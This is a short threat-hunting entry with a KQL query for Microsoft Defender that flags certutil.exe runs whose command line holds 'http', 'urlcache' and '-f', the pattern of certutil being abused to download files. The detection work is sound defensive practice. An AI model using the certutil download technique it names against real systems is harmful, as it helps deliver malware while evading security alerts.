Certutil download
Introduction
Certutil is a legitimate command-line utility included in Windows for managing certificates. However, attackers often abuse certutil as a living-off-the-land binary (LOLBin) to download malicious files or exfiltrate data without triggering traditional security alerts. Using certutil to download files allows threat actors to bypass some security controls by blending in with normal system activity.
KQL
DeviceProcessEvents
| where FileName == "certutil.exe"
| where tolower(ProcessCommandLine) has_all ("http", "urlcache", "-f")
| project-reorder Timestamp, ProcessCommandLine, FileName, InitiatingProcessAccountUpn